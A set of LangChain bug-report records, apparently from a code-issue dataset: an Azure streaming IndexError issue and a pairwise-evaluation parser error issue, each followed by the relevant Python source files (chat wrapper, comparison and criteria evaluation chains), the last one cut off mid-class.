https://python.langchain.com/docs/modules/model_io/models/chat/how_to/streaming
### Related Components
- [X] LLMs/Chat Models
### Reproduction
### Reproduction code
```python
# test.py
from langchain.chat_models import AzureChatOpenAI
from langchain.chat_models import ChatOpenAI
from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler
from langchain.schema import (
HumanMessage,
)
chat_1 = ChatOpenAI(streaming=True,
callbacks=[StreamingStdOutCallbackHandler()],
openai_api_key="SOME-KEY",
model='gpt-3.5-turbo',
temperature=0.7,
request_timeout=60,
max_retries=1)
chat_2 = AzureChatOpenAI(streaming=True,
callbacks=[StreamingStdOutCallbackHandler()],
openai_api_base="https://some-org-openai.openai.azure.com/",
openai_api_version="2023-06-01-preview",
openai_api_key="SOME-KEY",
deployment_name='gpt-3_5',
temperature=0.7,
request_timeout=60,
max_retries=1)
resp_1 = chat_1([HumanMessage(content="Write me a song about sparkling water.")])
resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")])
```
```shell
python test.py
```
### Output of command 1 (OpenAI)
```shell
Verse 1:
Bubbles dancing in my cup
Refreshing taste, can't get enough
Clear and crisp, it's always there
A drink that's beyond compare
Chorus:
Sparkling water, oh how you shine
You make my taste buds come alive
With every sip, I feel so fine
Sparkling water, you're one of a kind
Verse 2:
A drink that's light and calorie-free
A healthier choice, it's plain to see
A perfect thirst quencher, day or night
With sparkling water, everything's right
Chorus:
Sparkling water, oh how you shine
You make my taste buds come alive
With every sip, I feel so fine
Sparkling water, you're one of a kind
Bridge:
From the fizzy sensation to the bubbles popping
You're the drink I never want to stop sipping
Whether at a party or on my own
Sparkling water, you're always in the zone
Chorus:
Sparkling water, oh how you shine
You make my taste buds come alive
With every sip, I feel so fine
Sparkling water, you're one of a kind
Outro:
Sparkling water, you're my go-to
A drink that always feels brand new
With each sip, I'm left in awe
Sparkling water, you're the perfect beverage
```
### Output of command 2 (Azure OpenAI)
```shell
raw.Traceback (most recent call last):
File "/Users/someone/Development/test.py", line 29, in <module>
resp_2 = chat_2([HumanMessage(content="Write me a song about sparkling water.")])
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 208, in __call__
generation = self.generate(
^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 102, in generate
raise e
File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 94, in generate
results = [
^
File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/base.py", line 95, in <listcomp>
self._generate(m, stop=stop, run_manager=run_manager, **kwargs)
File "/opt/homebrew/lib/python3.11/site-packages/langchain/chat_models/openai.py", line 334, in _generate
role = stream_resp["choices"][0]["delta"].get("role", role)
~~~~~~~~~~~~~~~~~~~~~~^^^
IndexError: list index out of range
```
### Expected behavior
I can't find anything in existing issues or documentation stating that there is a known bug in the AzureOpenAI Service Streaming. | https://github.com/langchain-ai/langchain/issues/6462 | https://github.com/langchain-ai/langchain/pull/8241 | c1ea8da9bc2986532d6f1db810996ee72d5a6c1c | 0af48b06d00b23be65d0a10ff27aff4db0f6c85f | "2023-06-20T04:57:00Z" | python | "2023-07-25T18:30:22Z" | libs/langchain/langchain/chat_models/openai.py | """OpenAI chat wrapper."""
from __future__ import annotations
import logging
import sys
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
List,
Mapping,
Optional,
Tuple,
Union,
)
from pydantic import Field, root_validator
from tenacity import (
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.callbacks.manager import (
AsyncCallbackManagerForLLMRun,
CallbackManagerForLLMRun,
)
from langchain.chat_models.base import BaseChatModel
from langchain.schema import (
ChatGeneration,
ChatResult,
)
from langchain.schema.messages import (
AIMessage,
BaseMessage,
ChatMessage,
FunctionMessage,
HumanMessage,
SystemMessage,
)
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
if TYPE_CHECKING:
import tiktoken
logger = logging.getLogger(__name__)
def _import_tiktoken() -> Any:
try:
import tiktoken
except ImportError:
raise ValueError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_token_ids. "
"Please install it with `pip install tiktoken`."
)
return tiktoken
def _create_retry_decorator(llm: ChatOpenAI) -> Callable[[Any], Any]:
import openai
min_seconds = 1
max_seconds = 60
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
return retry(
reraise=True,
stop=stop_after_attempt(llm.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
async def acompletion_with_retry(llm: ChatOpenAI, **kwargs: Any) -> Any:
"""Use tenacity to retry the async completion call."""
retry_decorator = _create_retry_decorator(llm)
@retry_decorator
async def _completion_with_retry(**kwargs: Any) -> Any:
# Use OpenAI's async api https://github.com/openai/openai-python#async-api
return await llm.client.acreate(**kwargs)
return await _completion_with_retry(**kwargs)
def _convert_dict_to_message(_dict: Mapping[str, Any]) -> BaseMessage:
role = _dict["role"]
if role == "user":
return HumanMessage(content=_dict["content"])
elif role == "assistant":
# Fix for azure
# Also OpenAI returns None for tool invocations
content = _dict.get("content", "") or ""
if _dict.get("function_call"):
additional_kwargs = {"function_call": dict(_dict["function_call"])}
else:
additional_kwargs = {}
return AIMessage(content=content, additional_kwargs=additional_kwargs)
elif role == "system":
return SystemMessage(content=_dict["content"])
elif role == "function":
return FunctionMessage(content=_dict["content"], name=_dict["name"])
else:
return ChatMessage(content=_dict["content"], role=role)
def _convert_message_to_dict(message: BaseMessage) -> dict:
if isinstance(message, ChatMessage):
message_dict = {"role": message.role, "content": message.content}
elif isinstance(message, HumanMessage):
message_dict = {"role": "user", "content": message.content}
elif isinstance(message, AIMessage):
message_dict = {"role": "assistant", "content": message.content}
if "function_call" in message.additional_kwargs:
message_dict["function_call"] = message.additional_kwargs["function_call"]
elif isinstance(message, SystemMessage):
message_dict = {"role": "system", "content": message.content}
elif isinstance(message, FunctionMessage):
message_dict = {
"role": "function",
"content": message.content,
"name": message.name,
}
else:
raise ValueError(f"Got unknown type {message}")
if "name" in message.additional_kwargs:
message_dict["name"] = message.additional_kwargs["name"]
return message_dict
class ChatOpenAI(BaseChatModel):
"""Wrapper around OpenAI Chat large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.chat_models import ChatOpenAI
openai = ChatOpenAI(model_name="gpt-3.5-turbo")
"""
@property
def lc_secrets(self) -> Dict[str, str]:
return {"openai_api_key": "OPENAI_API_KEY"}
@property
def lc_serializable(self) -> bool:
return True
client: Any #: :meta private:
model_name: str = Field(default="gpt-3.5-turbo", alias="model")
"""Model name to use."""
temperature: float = 0.7
"""What sampling temperature to use."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
openai_api_key: Optional[str] = None
"""Base URL path for API requests,
leave blank if not using a proxy or service emulator."""
openai_api_base: Optional[str] = None
openai_organization: Optional[str] = None
# to support explicit proxy for OpenAI
openai_proxy: Optional[str] = None
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout for requests to OpenAI completion API. Default is 600 seconds."""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
streaming: bool = False
"""Whether to stream the results or not."""
n: int = 1
"""Number of chat completions to generate for each prompt."""
max_tokens: Optional[int] = None
"""Maximum number of tokens to generate."""
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
class Config:
"""Configuration for this pydantic object."""
allow_population_by_field_name = True
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
logger.warning(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
try:
import openai
except ImportError:
raise ValueError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
try:
values["client"] = openai.ChatCompletion
except AttributeError:
raise ValueError(
"`openai` has no `ChatCompletion` attribute, this is likely "
"due to an old version of the openai package. Try upgrading it "
"with `pip install --upgrade openai`."
)
if values["n"] < 1:
raise ValueError("n must be at least 1.")
if values["n"] > 1 and values["streaming"]:
raise ValueError("n must be 1 when streaming.")
return values
@property
def _default_params(self) -> Dict[str, Any]:
"""Get the default parameters for calling OpenAI API."""
return {
"model": self.model_name,
"request_timeout": self.request_timeout,
"max_tokens": self.max_tokens,
"stream": self.streaming,
"n": self.n,
"temperature": self.temperature,
**self.model_kwargs,
}
def completion_with_retry(self, **kwargs: Any) -> Any:
"""Use tenacity to retry the completion call."""
retry_decorator = _create_retry_decorator(self)
@retry_decorator
def _completion_with_retry(**kwargs: Any) -> Any:
return self.client.create(**kwargs)
return _completion_with_retry(**kwargs)
def _combine_llm_outputs(self, llm_outputs: List[Optional[dict]]) -> dict:
overall_token_usage: dict = {}
for output in llm_outputs:
if output is None:
# Happens in streaming
continue
token_usage = output["token_usage"]
for k, v in token_usage.items():
if k in overall_token_usage:
overall_token_usage[k] += v
else:
overall_token_usage[k] = v
return {"token_usage": overall_token_usage, "model_name": self.model_name}
def _generate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> ChatResult:
message_dicts, params = self._create_message_dicts(messages, stop)
params = {**params, **kwargs}
if self.streaming:
inner_completion = ""
role = "assistant"
params["stream"] = True
function_call: Optional[dict] = None
for stream_resp in self.completion_with_retry(
messages=message_dicts, **params
):
role = stream_resp["choices"][0]["delta"].get("role", role)
token = stream_resp["choices"][0]["delta"].get("content") or ""
inner_completion += token
_function_call = stream_resp["choices"][0]["delta"].get("function_call")
if _function_call:
if function_call is None:
function_call = _function_call
else:
function_call["arguments"] += _function_call["arguments"]
if run_manager:
run_manager.on_llm_new_token(token)
message = _convert_dict_to_message(
{
"content": inner_completion,
"role": role,
"function_call": function_call,
}
)
return ChatResult(generations=[ChatGeneration(message=message)])
response = self.completion_with_retry(messages=message_dicts, **params)
return self._create_chat_result(response)
def _create_message_dicts(
self, messages: List[BaseMessage], stop: Optional[List[str]]
) -> Tuple[List[Dict[str, Any]], Dict[str, Any]]:
params = self._client_params
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
message_dicts = [_convert_message_to_dict(m) for m in messages]
return message_dicts, params
def _create_chat_result(self, response: Mapping[str, Any]) -> ChatResult:
generations = []
for res in response["choices"]:
message = _convert_dict_to_message(res["message"])
gen = ChatGeneration(
message=message,
generation_info=dict(finish_reason=res.get("finish_reason")),
)
generations.append(gen)
token_usage = response.get("usage", {})
llm_output = {"token_usage": token_usage, "model_name": self.model_name}
return ChatResult(generations=generations, llm_output=llm_output)
async def _agenerate(
self,
messages: List[BaseMessage],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> ChatResult:
message_dicts, params = self._create_message_dicts(messages, stop)
params = {**params, **kwargs}
if self.streaming:
inner_completion = ""
role = "assistant"
params["stream"] = True
function_call: Optional[dict] = None
async for stream_resp in await acompletion_with_retry(
self, messages=message_dicts, **params
):
role = stream_resp["choices"][0]["delta"].get("role", role)
token = stream_resp["choices"][0]["delta"].get("content", "")
inner_completion += token or ""
_function_call = stream_resp["choices"][0]["delta"].get("function_call")
if _function_call:
if function_call is None:
function_call = _function_call
else:
function_call["arguments"] += _function_call["arguments"]
if run_manager:
await run_manager.on_llm_new_token(token)
message = _convert_dict_to_message(
{
"content": inner_completion,
"role": role,
"function_call": function_call,
}
)
return ChatResult(generations=[ChatGeneration(message=message)])
else:
response = await acompletion_with_retry(
self, messages=message_dicts, **params
)
return self._create_chat_result(response)
@property
def _identifying_params(self) -> Dict[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _client_params(self) -> Dict[str, Any]:
"""Get the parameters used for the openai client."""
openai_creds: Dict[str, Any] = {
"api_key": self.openai_api_key,
"api_base": self.openai_api_base,
"organization": self.openai_organization,
"model": self.model_name,
}
if self.openai_proxy:
import openai
openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy} # type: ignore[assignment] # noqa: E501
return {**self._default_params, **openai_creds}
def _get_invocation_params(
self, stop: Optional[List[str]] = None, **kwargs: Any
) -> Dict[str, Any]:
"""Get the parameters used to invoke the model."""
return {
"model": self.model_name,
**super()._get_invocation_params(stop=stop),
**self._default_params,
**kwargs,
}
@property
def _llm_type(self) -> str:
"""Return type of chat model."""
return "openai-chat"
def _get_encoding_model(self) -> Tuple[str, tiktoken.Encoding]:
tiktoken_ = _import_tiktoken()
if self.tiktoken_model_name is not None:
model = self.tiktoken_model_name
else:
model = self.model_name
if model == "gpt-3.5-turbo":
# gpt-3.5-turbo may change over time.
# Returning num tokens assuming gpt-3.5-turbo-0301.
model = "gpt-3.5-turbo-0301"
elif model == "gpt-4":
# gpt-4 may change over time.
# Returning num tokens assuming gpt-4-0314.
model = "gpt-4-0314"
# Returns the number of tokens used by a list of messages.
try:
encoding = tiktoken_.encoding_for_model(model)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken_.get_encoding(model)
return model, encoding
def get_token_ids(self, text: str) -> List[int]:
"""Get the tokens present in the text with tiktoken package."""
# tiktoken NOT supported for Python 3.7 or below
if sys.version_info[1] <= 7:
return super().get_token_ids(text)
_, encoding_model = self._get_encoding_model()
return encoding_model.encode(text)
def get_num_tokens_from_messages(self, messages: List[BaseMessage]) -> int:
"""Calculate num tokens for gpt-3.5-turbo and gpt-4 with tiktoken package.
Official documentation: https://github.com/openai/openai-cookbook/blob/
main/examples/How_to_format_inputs_to_ChatGPT_models.ipynb"""
if sys.version_info[1] <= 7:
return super().get_num_tokens_from_messages(messages)
model, encoding = self._get_encoding_model()
if model.startswith("gpt-3.5-turbo"):
# every message follows <im_start>{role/name}\n{content}<im_end>\n
tokens_per_message = 4
# if there's a name, the role is omitted
tokens_per_name = -1
elif model.startswith("gpt-4"):
tokens_per_message = 3
tokens_per_name = 1
else:
raise NotImplementedError(
f"get_num_tokens_from_messages() is not presently implemented "
f"for model {model}."
"See https://github.com/openai/openai-python/blob/main/chatml.md for "
"information on how messages are converted to tokens."
)
num_tokens = 0
messages_dict = [_convert_message_to_dict(m) for m in messages]
for message in messages_dict:
num_tokens += tokens_per_message
for key, value in message.items():
num_tokens += len(encoding.encode(value))
if key == "name":
num_tokens += tokens_per_name
# every reply is primed with <im_start>assistant
num_tokens += 3
return num_tokens
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,272 | not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs | ### System Info
platform = mac m2
python = 3.11
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
prompt_template = PromptTemplate.from_template(
"""Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label.
Consider the following factors while analyzing:
- Relevance to the input context
- Semantic similarity with the reference label
- Consistency with any specifics mentioned in the input
The DATA for this decision are as follows:
Input Context: {input}
Reference Label: {reference}
Option A: {prediction}
Option B: {prediction_b}
After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]].
---
Reasoning:
"""
)
evalutionChain = LabeledPairwiseStringEvalChain.from_llm(
llm=llm, prompt=prompt_template
)
result = evalutionChain.evaluate_string_pairs(
input=self.currentQuery,
prediction=response1,
prediction_b=response2,
reference=self.formatSourcesStructure(sourcedocs),
)
```
sometime it gives error like
```
not enough values to unpack (expected 2, got 1)
```
it like every 3-4 request, 1 request failing with this request,
and when request failed, on next request it gives the response
### Expected behavior
There will be no error, and should return valid response | https://github.com/langchain-ai/langchain/issues/8272 | https://github.com/langchain-ai/langchain/pull/8278 | 9cbefcc56cbce50e1f6d9392c17e15415d55b7ba | adf019724f095b1835040f4dd8c1ff0026cbc729 | "2023-07-26T07:20:57Z" | python | "2023-07-26T08:53:22Z" | libs/langchain/langchain/evaluation/comparison/eval_chain.py | """Base classes for comparing the output of two models."""
from __future__ import annotations
from typing import Any, Dict, List, Optional
from pydantic import Extra, Field
from langchain.callbacks.manager import Callbacks
from langchain.chains.llm import LLMChain
from langchain.evaluation.comparison.prompt import PROMPT, PROMPT_WITH_REFERENCE
from langchain.evaluation.schema import LLMEvalChain, PairwiseStringEvaluator
from langchain.prompts.prompt import PromptTemplate
from langchain.schema import RUN_KEY, BaseOutputParser
from langchain.schema.language_model import BaseLanguageModel
class PairwiseStringResultOutputParser(BaseOutputParser[dict]):
"""A parser for the output of the PairwiseStringEvalChain.
Attributes:
_type (str): The type of the output parser.
"""
@property
def _type(self) -> str:
"""Return the type of the output parser.
Returns:
str: The type of the output parser.
"""
return "pairwise_string_result"
def parse(self, text: str) -> Any:
"""Parse the output text.
Args:
text (str): The output text to parse.
Returns:
Any: The parsed output.
Raises:
ValueError: If the verdict is invalid.
"""
reasoning, verdict = text.strip().rsplit("\n", maxsplit=1)
verdict = verdict.strip("[").strip("]")
if verdict not in {"A", "B", "C"}:
raise ValueError(
f"Invalid verdict: {verdict}. "
"Verdict must be one of 'A', 'B', or 'C'."
)
# C means the models are tied. Return 'None' meaning no preference
verdict_ = None if verdict == "C" else verdict
score = {
"A": 1,
"B": 0,
None: 0.5,
}.get(verdict_)
return {
"reasoning": reasoning,
"value": verdict_,
"score": score,
}
class PairwiseStringEvalChain(PairwiseStringEvaluator, LLMEvalChain, LLMChain):
"""A chain for comparing two outputs, such as the outputs
of two models, prompts, or outputs of a single model on similar inputs.
Attributes:
output_parser (BaseOutputParser): The output parser for the chain.
Example:
>>> from langchain.chat_models import ChatOpenAI
>>> from langchain.evaluation.comparison import PairwiseStringEvalChain
>>> llm = ChatOpenAI(temperature=0)
>>> chain = PairwiseStringEvalChain.from_llm(llm=llm)
>>> result = chain.evaluate_string_pairs(
... input = "What is the chemical formula for water?",
... prediction = "H2O",
... prediction_b = (
... "The chemical formula for water is H2O, which means"
... " there are two hydrogen atoms and one oxygen atom."
... reference = "The chemical formula for water is H2O.",
... )
>>> print(result["text"])
# {
# "value": "B",
# "comment": "Both responses accurately state"
# " that the chemical formula for water is H2O."
# " However, Response B provides additional information"
# . " by explaining what the formula means.\\n[[B]]"
# }
"""
output_key: str = "results" #: :meta private:
output_parser: BaseOutputParser = Field(
default_factory=PairwiseStringResultOutputParser
)
class Config:
"""Configuration for the PairwiseStringEvalChain."""
extra = Extra.ignore
@property
def requires_reference(self) -> bool:
"""Return whether the chain requires a reference.
Returns:
bool: True if the chain requires a reference, False otherwise.
"""
return False
@property
def requires_input(self) -> bool:
"""Return whether the chain requires an input.
Returns:
bool: True if the chain requires an input, False otherwise.
"""
return True
@property
def _skip_reference_warning(self) -> str:
"""Return the warning to show when reference is ignored.
Returns:
str: The warning to show when reference is ignored.
"""
return (
f"Ignoring reference in {self.__class__.__name__}, as it is not expected."
"\nTo use a reference, use the LabeledPairwiseStringEvalChain"
" (EvaluatorType.LABELED_PAIRWISE_STRING) instead."
)
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
*,
prompt: Optional[PromptTemplate] = None,
**kwargs: Any,
) -> PairwiseStringEvalChain:
"""Initialize the PairwiseStringEvalChain from an LLM.
Args:
llm (BaseLanguageModel): The LLM to use.
prompt (PromptTemplate, optional): The prompt to use.
**kwargs (Any): Additional keyword arguments.
Returns:
PairwiseStringEvalChain: The initialized PairwiseStringEvalChain.
Raises:
ValueError: If the input variables are not as expected.
"""
expected_input_vars = {"prediction", "prediction_b", "input"}
prompt_ = prompt or PROMPT
if expected_input_vars != set(prompt_.input_variables):
raise ValueError(
f"Input variables should be {expected_input_vars}, "
f"but got {prompt_.input_variables}"
)
return cls(llm=llm, prompt=prompt_, **kwargs)
def _prepare_input(
self,
prediction: str,
prediction_b: str,
input: Optional[str],
reference: Optional[str],
) -> dict:
"""Prepare the input for the chain.
Args:
prediction (str): The output string from the first model.
prediction_b (str): The output string from the second model.
input (str, optional): The input or task string.
reference (str, optional): The reference string, if any.
Returns:
dict: The prepared input for the chain.
"""
input_ = {
"prediction": prediction,
"prediction_b": prediction_b,
"input": input,
}
if self.requires_reference:
input_["reference"] = reference
return input_
def _prepare_output(self, result: dict) -> dict:
"""Prepare the output."""
parsed = result[self.output_key]
if RUN_KEY in result:
parsed[RUN_KEY] = result[RUN_KEY]
return parsed
def _evaluate_string_pairs(
self,
*,
prediction: str,
prediction_b: str,
input: Optional[str] = None,
reference: Optional[str] = None,
callbacks: Callbacks = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
include_run_info: bool = False,
**kwargs: Any,
) -> dict:
"""Evaluate whether output A is preferred to output B.
Args:
prediction (str): The output string from the first model.
prediction_b (str): The output string from the second model.
input (str, optional): The input or task string.
callbacks (Callbacks, optional): The callbacks to use.
reference (str, optional): The reference string, if any.
**kwargs (Any): Additional keyword arguments.
Returns:
dict: A dictionary containing:
- reasoning: The reasoning for the preference.
- value: The preference value, which is either 'A', 'B', or None
for no preference.
- score: The preference score, which is 1 for 'A', 0 for 'B',
and 0.5 for None.
"""
input_ = self._prepare_input(prediction, prediction_b, input, reference)
result = self(
inputs=input_,
callbacks=callbacks,
tags=tags,
metadata=metadata,
include_run_info=include_run_info,
)
return self._prepare_output(result)
async def _aevaluate_string_pairs(
self,
*,
prediction: str,
prediction_b: str,
reference: Optional[str] = None,
input: Optional[str] = None,
callbacks: Callbacks = None,
tags: Optional[List[str]] = None,
metadata: Optional[Dict[str, Any]] = None,
include_run_info: bool = False,
**kwargs: Any,
) -> dict:
"""Asynchronously evaluate whether output A is preferred to output B.
Args:
prediction (str): The output string from the first model.
prediction_b (str): The output string from the second model.
input (str, optional): The input or task string.
callbacks (Callbacks, optional): The callbacks to use.
reference (str, optional): The reference string, if any.
**kwargs (Any): Additional keyword arguments.
Returns:
dict: A dictionary containing:
- reasoning: The reasoning for the preference.
- value: The preference value, which is either 'A', 'B', or None
for no preference.
- score: The preference score, which is 1 for 'A', 0 for 'B',
and 0.5 for None.
"""
input_ = self._prepare_input(prediction, prediction_b, input, reference)
result = await self.acall(
inputs=input_,
callbacks=callbacks,
tags=tags,
metadata=metadata,
include_run_info=include_run_info,
)
return self._prepare_output(result)
class LabeledPairwiseStringEvalChain(PairwiseStringEvalChain):
"""A chain for comparing two outputs, such as the outputs
of two models, prompts, or outputs of a single model on similar inputs,
with labeled preferences.
Attributes:
output_parser (BaseOutputParser): The output parser for the chain.
"""
@property
def requires_reference(self) -> bool:
"""Return whether the chain requires a reference.
Returns:
bool: True if the chain requires a reference, False otherwise.
"""
return True
@classmethod
def from_llm(
cls,
llm: BaseLanguageModel,
*,
prompt: Optional[PromptTemplate] = None,
**kwargs: Any,
) -> PairwiseStringEvalChain:
"""Initialize the LabeledPairwiseStringEvalChain from an LLM.
Args:
llm (BaseLanguageModel): The LLM to use.
prompt (PromptTemplate, optional): The prompt to use.
**kwargs (Any): Additional keyword arguments.
Returns:
LabeledPairwiseStringEvalChain: The initialized LabeledPairwiseStringEvalChain.
Raises:
ValueError: If the input variables are not as expected.
""" # noqa: E501
expected_input_vars = {"prediction", "prediction_b", "input", "reference"}
prompt_ = prompt or PROMPT_WITH_REFERENCE
if expected_input_vars != set(prompt_.input_variables):
raise ValueError(
f"Input variables should be {expected_input_vars}, "
f"but got {prompt_.input_variables}"
)
return cls(llm=llm, prompt=prompt_, **kwargs)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,272 | not enough values to unpack (expected 2, got 1) while LabeledPairwiseStringEvalChain with evaluate_string_pairs | ### System Info
platform = mac m2
python = 3.11
### Who can help?
@hwchase17
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```
prompt_template = PromptTemplate.from_template(
"""Given the input context and the reference, analyze and determine which prediction, A or B, aligns most closely with the reference label.
Consider the following factors while analyzing:
- Relevance to the input context
- Semantic similarity with the reference label
- Consistency with any specifics mentioned in the input
The DATA for this decision are as follows:
Input Context: {input}
Reference Label: {reference}
Option A: {prediction}
Option B: {prediction_b}
After analyzing, provide the reasoning for your selection, and finally, respond with either [[A]] or [[B]] on its own line. In the case that both options are equally similar, default to option [[A]].
---
Reasoning:
"""
)
evalutionChain = LabeledPairwiseStringEvalChain.from_llm(
llm=llm, prompt=prompt_template
)
result = evalutionChain.evaluate_string_pairs(
input=self.currentQuery,
prediction=response1,
prediction_b=response2,
reference=self.formatSourcesStructure(sourcedocs),
)
```
sometime it gives error like
```
not enough values to unpack (expected 2, got 1)
```
it like every 3-4 request, 1 request failing with this request,
and when request failed, on next request it gives the response
### Expected behavior
There will be no error, and should return valid response | https://github.com/langchain-ai/langchain/issues/8272 | https://github.com/langchain-ai/langchain/pull/8278 | 9cbefcc56cbce50e1f6d9392c17e15415d55b7ba | adf019724f095b1835040f4dd8c1ff0026cbc729 | "2023-07-26T07:20:57Z" | python | "2023-07-26T08:53:22Z" | libs/langchain/langchain/evaluation/criteria/eval_chain.py | from __future__ import annotations
from enum import Enum
from typing import Any, Dict, List, Mapping, Optional, Union
from pydantic import Extra, Field
from langchain.callbacks.manager import Callbacks
from langchain.chains.constitutional_ai.models import ConstitutionalPrinciple
from langchain.chains.llm import LLMChain
from langchain.evaluation.criteria.prompt import PROMPT, PROMPT_WITH_REFERENCES
from langchain.evaluation.schema import LLMEvalChain, StringEvaluator
from langchain.schema import RUN_KEY, BaseOutputParser, BasePromptTemplate
from langchain.schema.language_model import BaseLanguageModel
class Criteria(str, Enum):
"""A Criteria to evaluate."""
CONCISENESS = "conciseness"
RELEVANCE = "relevance"
CORRECTNESS = "correctness"
COHERENCE = "coherence"
HARMFULNESS = "harmfulness"
MALICIOUSNESS = "maliciousness"
HELPFULNESS = "helpfulness"
CONTROVERSIALITY = "controversiality"
MISOGYNY = "misogyny"
CRIMINALITY = "criminality"
INSENSITIVITY = "insensitivity"
_SUPPORTED_CRITERIA = {
Criteria.CONCISENESS: "Is the submission concise and to the point?",
Criteria.RELEVANCE: "Is the submission referring to a real quote from the text?",
Criteria.CORRECTNESS: "Is the submission correct, accurate, and factual?",
Criteria.COHERENCE: "Is the submission coherent, well-structured, and organized?",
Criteria.HARMFULNESS: "Is the submission harmful, offensive, or inappropriate?"
" If so, response Y. If not, respond N.",
Criteria.MALICIOUSNESS: "Is the submission malicious in any way?"
" If so, response Y. If not, respond N.",
Criteria.HELPFULNESS: "Is the submission helpful, insightful, and appropriate?"
" If so, response Y. If not, respond N.",
Criteria.CONTROVERSIALITY: "Is the submission controversial or debatable?"
" If so, response Y. If not, respond N.",
Criteria.MISOGYNY: "Is the submission misogynistic? If so, response Y."
" If not, respond N.",
Criteria.CRIMINALITY: "Is the submission criminal in any way?"
" If so, response Y. If not, respond N.",
Criteria.INSENSITIVITY: "Is the submission insensitive to any group of people?"
" If so, response Y. If not, respond N.",
}
class CriteriaResultOutputParser(BaseOutputParser[dict]):
"""A parser for the output of the CriteriaEvalChain."""
@property
def _type(self) -> str:
